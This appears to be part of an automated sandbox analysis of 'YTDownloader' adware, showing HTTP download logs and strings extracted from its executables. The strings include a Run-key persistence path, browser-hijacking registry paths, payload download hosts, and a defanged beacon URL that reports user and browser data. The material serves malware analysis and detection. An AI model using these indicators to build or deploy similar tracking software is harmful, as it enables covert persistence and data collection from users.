Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438276444"
Last-Modified: Thu, 30 Jul 2015 17:14:04 GMT
Cache-Control: max-age=1462
Content-Length: 2088396
Content-Type: text/plain
X-HW: 1438402659.dop011.fr7.t,1438402659.cds012.fr7.sr,1438402658.dop006.dc1.r,1438402659.cds025.dc1.c,1438402659.cds012.fr7.pr
<<< skipped >>>
GET /web/gf/all/setup.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313709"
Last-Modified: Fri, 31 Jul 2015 03:35:09 GMT
Cache-Control: max-age=710
Content-Length: 228352
Content-Range: bytes 0-228351/228352
Content-Type: application/x-msdownload
X-HW: 1438402620.dop002.fr7.t,1438402620.cds001.fr7.c
Content-Disposition: attachment; filename="setup.exe"
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8378
Content-Range: bytes 250000-499999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: W11PGESgriHPVXjxalfY5hKW4A47dQqA_MRvIuc40VVTaL5UaDag4Q==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8378
Content-Range: bytes 750000-999999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YTDcXhvgAU_h-rTyA2IcT7xQH0txZVWpbraSwchOOalm1TOa_6IEhQ==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 01:57:22 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 8379
Content-Range: bytes 1250000-1499999/2707024
X-Cache: Hit from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Gtiqzds9LZmjOtRB9p4p802qRlQ_vUcKFEvUZk2tlNHwHOLC_utERA==
<<< skipped >>>
GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Sat, 01 Aug 2015 04:17:02 GMT
Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT
ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1750000-1999999/2707024
X-Cache: Miss from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: QDcxTqfGoYLlyMFwwkH3MzJm9xJPdrU8XaxNxtSPPTF_rsg_EU4KMA==
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
Process token open Error: %u
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb
KERNEL32.dll
USER32.dll
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4 5 52585>5
01S1|3
Amscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
BrowserHelper.exe
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Run
e:%d s:%d
\BrowserHelper.exe
C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE
BrowserHelper.exe_3952:
.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Higher: %x
Lower: %x
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb
WinExec
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegOpenKeyW
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoW
WININET.dll
VERSION.dll
PSAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCHttp@@
C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
HTTP/1.1
XXX
Content-Disposition: form-data; name="%s"
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows 95
Windows 98
Windows Me
Windows NT
Windows 2000
Windows XP
Windows 2003 Server
Windows Vista
Windows 7
Windows CE
%sLow\%s\
%s\%s\%s\
%C:\Users\Public\Documents\%s\%s\
%s\Application Data\%s\%s\
ConfigDB.dll
config.xml
<d/d/%d d:d:d::d 0x%X>
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::BackupTraceFile] %s
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
\StringFileInfo\x\%s
kernel32.dll
WININET.DLL
user32.dll
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
PipeName
[CUtils::GetDAPPipeName] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
%d.%d.%d.%d
"%s" "%s"
d/d/%d d:d:d::d
"%s" %s
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
%d-d-d
0.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe
%Program Files%\Internet Explorer\IEXPLORE.EXE
http\shell\open\command
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk
Mozilla Firefox
Google Chrome
explorer.exe
&exe%d=%s&ver%d=%s&arr%d=%s
&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d
hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?
BrowserHelper.txt
BrowserHelperBk.txt
Chrome
Mozilla
iexplore.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
%s?e=%s
zvl=%s&
1.7.0.0
Updater.exe
YTDownloader.exe_2380:
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
CRtmpParser::GetFieldDataString
CRtmpParser::GetFieldDataNumber
NetStream.Play.Reset
NetStream.Unpause.Notify
NetStream.Pause.Notify
NetStream.Seek.Notify
NetStream.Play.Stop
NetStream.Play.Failed
NetStream.Failed
()$^.* ?[]|\-{},:=!video/WebM
"url_encoded_fmt_stream_map": "(.*?)"
rtmpe%3Dyes
url_encoded_fmt_stream_map=
%s, string reference, index: %d, not supported, ignoring!
%s - AMF3 unknown/unsupported datatype 0xx, @%p
AMF3_DATE reference: %d, not supported!
Property: <%s%s>
timestamp: %.2f, UTC offset: %d
INVALID TYPE 0xx
Property: <%sSTRICT_ARRAY>
Property: <%sECMA_ARRAY>
Property: <%sOBJECT>
AMF_Encode - failed to encode property in index %d
%s, invalid type. %d
%s, failed to decode AMF3 property!
Member: %s
Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d
Class reference: %d
Object reference, index: %d
%s: Empty buffer/no buffer pointer!
%s - unknown datatype 0xx, @%p
AMF_TYPED_OBJECT not supported!
AMF_REFERENCE not supported!
%s: Name size out of range: namesize (%d) > len (%d) - 2
%s: Not enough data for decoding with name, less than 4 bytes!
HTTP/1
%s, Setting socket timeout to %ds failed!
%s, No SSL/TLS support
HTTP_get
If-Modified-Since: %s
GET %s HTTP/1.0
User-Agent: %s
Host: %s
Mozilla/5.0
%s, d %s %d d:d:d GMT
size: x
date: %s
ctim: %s
url: %.*s
%s: couldn't open %s for writing, errno %d (%s)
%s: couldn't contact swfurl %s (HTTP error %d)
%s: swfurl %s not found
%s: connection lost while downloading swfurl %s
1.1.4
%s%s\.swfinfo
%s: %s
hXXp://
[[IMPORT]]
No application or playpath in URL!
Invalid port number!
No hostname in URL!
Parsed protocol: %d
RTMP URL: No :// in url!
NetConnection.confStream
NetStream.Publish.Start
NetStream.Play.UnpublishNotify
NetStream.Play.PublishNotify
NetStream.Play.Complete
NetStream.Play.Start
NetConnection.Connect.InvalidApp
NetStream.Play.StreamNotFound
NetStream.Authenticate.UsherToken
Publisher password
pubPasswd
Key for SecureToken response
Justin.tv authentication token
URL to player SWF file
swfUrl
URL of played media's web page
pageUrl
URL to played stream
tcUrl
DH public key does not fulfill y^q mod p = 1
DH public key must be at most p-2
DH public key must be at least 2
RC4 In Key:
RC4 Out Key:
%s: Couldn't calculate correct DH offset (got %d), exiting!
%s: Couldn't calculate correct digest offset (got %d), exiting
%s: Couldn't calculate DH offset (got %d), exiting!
%s: Couldn't calculate digest offset (got %d), exiting!
RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx
Connecting via SOCKS proxy: %s:%d
SWFSize : %u
live : %s
StopTime : %d msec
StartTime : %d msec
flashVer : %s
NetStream.Authenticate.UsherToken : %s
subscribepath : %s
auth : %s
pageUrl : %s
swfUrl : %s
tcUrl : %s
Playpath : %s
Port : %d
Protocol : %s
s %-7s %s
Unknown option %s
%s://%.*s:%d/%.*s
Problem accessing the DNS. (addr: %s)
%s, error
%s, Authentication failed: unknown auth mode: %s
%s, Authentication failed
%s, new app: %.*s tcUrl: %.*s playpath: %s
&nonce=%s&cnonce=%s&nc=%s&response=%s
%s, md5(%s:%s:%s:%s:%s:%s) =>
%s, md5(%s:/%.*s) =>
%s, md5(%s:%s:%s) =>
%s, pubToken1: %s
?%s&user=%s
%s, Authentication failed: no such user
%s, Authentication failed: wrong password
%s, pubToken2: %s
&challenge=%s&response=%s&opaque=%s
%s, b64(md5_2) = %s
%s, b64(%d) = %s
%s, b64(md5_1) = %s
%s, md5(%s%s%s) =>
%s, par:"%s" = val:"%s"
%s, need to set pubUser & pubPasswd for publisher auth
%s, wrong pubUser & pubPasswd for publisher auth
%-22.*s%s
%s, error decoding meta data packet
%s, received: chunk size change to %d
%s: server BW = %d
%s: client BW = %d %d
%s, recv returned %d. GetSockError(): %d (%s)
POST /%s%s/%d HTTP/1.1
Host: %.*s:%d
Content-length: %d
HTTP/1.1 200
%s, RTMP send error %d (%d bytes)
%s: fd=%d, size=%d
Invoking %s
sanity failed!! trying to send header of type: 0xx.
%s, failed to allocate packet
FCSubscribe: %s
UsherToken: %s
%s, %d, pauseTime=%d
%s, seekTime=%d, stopTime=%d, sending play: %s
sending ctrl. type: 0xx
%s: Ignoring SWFVerification request, use --swfVfy!
%s: SWFVerification Type %d request not supported! Patches welcome...
%s, SWFVerification ping received:
%s, Stream Begin %d
%s, Stream EOF %d
%s, Stream Dry %d
%s, Stream IsRecorded %d
%s, Ping %d
%s, Stream BufferEmpty %d
%s, Stream BufferReady %d
%s, Stream xx %d
%s, received ctrl. type: %d, len: %d
%s, RTMP socket closed by peer
%s, No valid HTTP response found
%s, failed to read RTMP packet body. len: %u
%s, failed to read extended timestamp
%s, failed to read RTMP packet header. type: %x
%s, m_nChannel: %0x
%s, failed to read RTMP packet header 3nd byte
%s, failed to read RTMP packet header 2nd byte
%s, failed to read RTMP packet header
%s: fd=%d
%s: client signature does not match!
%s: Handshaking finished....
%s: Genuine Adobe Flash Media Server
%s: Server not genuine Adobe!
%s: Signature calculated:
%s: Digest key:
%s: Server sent signature:
%s: Wait, did the server just refuse signed authentication?
%s: Client signature calculated:
%s: Calculated digest key from secure key and server digest:
%s: Secret key:
%s: Wrong secret key position!
%s: Server DH public key offset: %d
%s: FMS Version : %d.%d.%d.%d
%s: Server Uptime : %d
%s: Type mismatch: client sent %d, server answered %d
%s: Type Answer : X
%s: Initial client digest:
%s: Client digest offset: %d
%s: Couldn't write public key!
%s: Couldn't generate Diffie-Hellmann public key!
%s: DH pubkey position: %d
%s: Couldn't initialize Diffie-Hellmann!
%s: Client type: X
%s: Genuine Adobe Flash Player
%s: Client not genuine Adobe!
%s: Client sent signature:
%s: 2nd handshake:
%s: Sending handshake response:
%s: Server signature calculated:
%s: Client DH public key offset: %d
%s: Player Version: %d.%d.%d.%d
%s: Client Uptime : %d
%s: Initial server digest:
%s: Server digest offset: %d
%s: Unknown version x
%s: Type Requested : X
%s, RTMP connect failed.
%s, handshaked
%s, handshake failed.
%s, ... connected, handshaking
%s, Could not connect for handshake
%s, no SSL/TLS support
%s, SOCKS returned error code %d
%s, failed to create socket. Error: %d
%s, SOCKS negotiation failed.
%s ... SOCKS negotiation
%s, failed to connect socket. %d (%s)
Closing connection: %s
%s, onStatus: %s
trying to connect with redirected url
%s, error description: %s
%s, received error for method call <%s>
%s, received result id %f without matching request
%s, received result for method call <%s>
%s, server invoking <%s>
%s, error decoding invoke packet
%s, Sanity failed. no string method in invoke packet
%s, flex shared object, size %u bytes, not supported, ignoring
%s, flex message, size %u bytes, not fully supported
%s, received: notify %u bytes
%s, shared object, not supported, ignoring
%s, received: invoke %u bytes
%s, unknown packet type received: 0xx
%s, flex stream send, size %u bytes, not supported, ignoring
%s, received: bytes read report
Wrong data size (%u), stream corrupted, aborting!
Couldn't find the seeked keyframe in this chunk!
First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?
FLV Stream: Keyframe doesn't match!
Found keyframe with resume-keyframe timestamp!
Checked keyframe successfully!
ignoring too small audio packet: size: %d
ignoring too small video packet: size: %d
Got Play.Complete or Play.Stop from server. Assuming stream is complete
%s: Failed to close listening socket, error %d
Caught signal: %d, cleaning up, just a second...
-c, --cert cert RTMPS cert
-k, --key key RTMPS key
-p, --port port Overrides the port in the rtmp url
%s, _beginthread failed with %d
Unknown command '%c', ignoring
-o %s
-j "%s"
-p "%s"
-W "%s"
-f "%s"
-a "%s"
-r "%s"
%s, client invoking <%s>
%s, received packet type X, size %u bytes
%s: accept failed
%s: processed request
%s: accepted connection from %s
%s, listen failed
%s, TCP bind failed for port number: %d
%s, couldn't create socket
chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe
._-$,;~()
.mpeg
video/webm
.webm
.xslt
.json
audio/x-mpegurl
.torrent
.jpeg
.shtml
.shtm
.html
url_rewrite_patterns
ssl_certificate
listening_ports
index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
**.shtml$|**.shtm$
mydomain.com
**.cgi$|**.pl$|**.php$
SSL_CTX_use_certificate_chain_file
SSL_CTX_set_default_passwd_cb
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey_file
%s %s:
[0lu] [error] [client %s]
%.*s%s
%d-%3s-%d %d:%d:%d
%*3s, %d %3s %d %d:%d:%d
%d %3s %d %d:%d:%d
%d/%3s/%d %d:%d:%d
%[^:]:%[^:]:%s
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"
%s:%s:%s
%s.tmp
<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td> %s</td></tr>
%d-%b-%Y %H:%M
**.htpasswd$
%s%c%s
%a, %d %b %Y %H:%M:%S GMT
HTTP/
%s: CGI env buffer truncated for [%s]
HTTP_%s=%s
REMOTE_USER=%s
PERLLIB=%s
SystemDrive=%s
SYSTEMROOT=%s
COMSPEC=%s
PATH_INFO=%s
PATH=%s
CONTENT_LENGTH=%s
QUERY_STRING=%s
CONTENT_TYPE=%s
HTTPS=%s
PATH_TRANSLATED=%s
SCRIPT_FILENAME=%s
SCRIPT_NAME=%.*s%s
REQUEST_URI=%s
REMOTE_PORT=%d
REMOTE_ADDR=%s
REQUEST_METHOD=%s
SERVER_PORT=%d
SERVER_PROTOCOL=HTTP/1.1
DOCUMENT_ROOT=%s
SERVER_ROOT=%s
SERVER_NAME=%s
Cannot SSI #exec: [%s]: %s
Bad SSI #exec: [%s]
HTTP/1.1 200 OK
<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>
HTTP/1.1 207 Multi-Status
%d.%d.%d.%d%n
%d.%d.%d.%d/%d%n
%lf%c
%s/%s
boundary=™s
HTTP/1.1 302 Found
Location: hXXps://%s:%d%s
24[^:]
%d.%d.%d.%d:%d%n
Cannot add SSL socket, is -ssl_certificate option set?
%s: %.*s: invalid port spec. Expecting list of: %s
[IP_ADDRESS:]PORT[s|p]
%s: cannot bind to %.*s: %s
set_ports_option
%s - %s [%s] "%s %s HTTP/%s" %d %I64d
%d/%b/%Y:%H:%M:%S %z
%s: subnet must be [ |-]x.x.x.x[/x]
Cannot open %s: %s
calloc(): %s
connect(%s:%d): %s
socket(): %s
gethostbyname(%s): %s
%s: %s is not allowed to connect
HTTP/1.1 %d %s
Content-Length: %d
Connection: %s
Error %d: %s
%s: CreateProcess(%s): %ld
%s%s%s\%s
%.*s%c%s
.htpasswd
fopen(%s): %s
%s: cannot open %s: %s
<tr><td><a href="%s%s">%s</a></td><td> %s</td><td> %s</td></tr>
<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>Error: opendir(%s): %s
Date: %s
Last-Modified: %s
Etag: %s
HTTP/1.1 100 Continue
Cannot create CGI pipe: %s
fopen: %s
CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]
Cannot spawn CGI process [%s]: %s
put_dir(%s): %s
HTTP/1.1 %d OK
Bad SSI #include: [%s]
Cannot open SSI #include: [%s]: fopen(%s): %s
%s: SSI tag is too large
%s: unknown SSI command: "%s"
SSI #include level is too deep (%s)
Method %s is not implemented
HTTP/1.1 301 Moved Permanently
Location: %s/
remove(%s): %s
Bad HTTP version
Bad HTTP version: [%s]
Invalid URI: [%s]
%s: option value cannot be NULL
Invalid option: %s
warning: %s: duplicate option
Hello from mongoose! Remote port: %d
HttpSendRequestW failed with error code
HttpOpenRequestW failed with error code
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Visual C CRT: Not enough memory to complete call to strerror.
cmd.exe
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb
.?AVCHttp@@
<>"#{}|\^~[]`' ?&.?AVCRtmpe@@
.?AV?$IBaseInterface@VIKeysBank@@@@
.?AVIKeysBank@@
.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@
.?AVCKeysBank@@
.?AVCRtmpDataProperty@@
.?AVCRtmpPacket@@
.?AVCRtmpParser@@
.?AVChromeBrowserWindow@@
.?AVFirefoxBrowserWindow@@
.?AVOperaBrowserWindow@@
HTTP://
.?AVHttpParser@@
.?AVCHttpDownload@@
zcÁ
WinExec
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjectsEx
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
LIBEAY32.dll
HttpEndRequestW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
VERSION.dll
CertGetNameStringW
CertFreeCertificateContext
CryptMsgClose
CertCloseStore
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
PSAPI.DLL
IsValidURL
urlmon.dll
GdiplusShutdown
gdiplus.dll
GetCPInfo
GetProcessHeap
nnn%XXX
pppaSSS
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
Content-Disposition: form-data; name="%s"
XXX
Content-Type: multipart/form-data; boundary=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
ConfigDB.dll
config.xml
%%X
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
CertGetNameString failed.
CryptDecodeObject failed with %x
CertFindCertificateInStore failed with %x
MoreInfo Link : %s
Publisher Link : %s
Program Name : %s
CryptMsgGetParam failed with %x
CryptQueryObject failed with %x
user32.dll
WININET.DLL
kernel32.dll
d/d/%d d:d:d::d
%d.%d.%d.%d
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
"%s" "%s"
"%s" %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPPipeName] Name: %s
PipeName
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey
[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
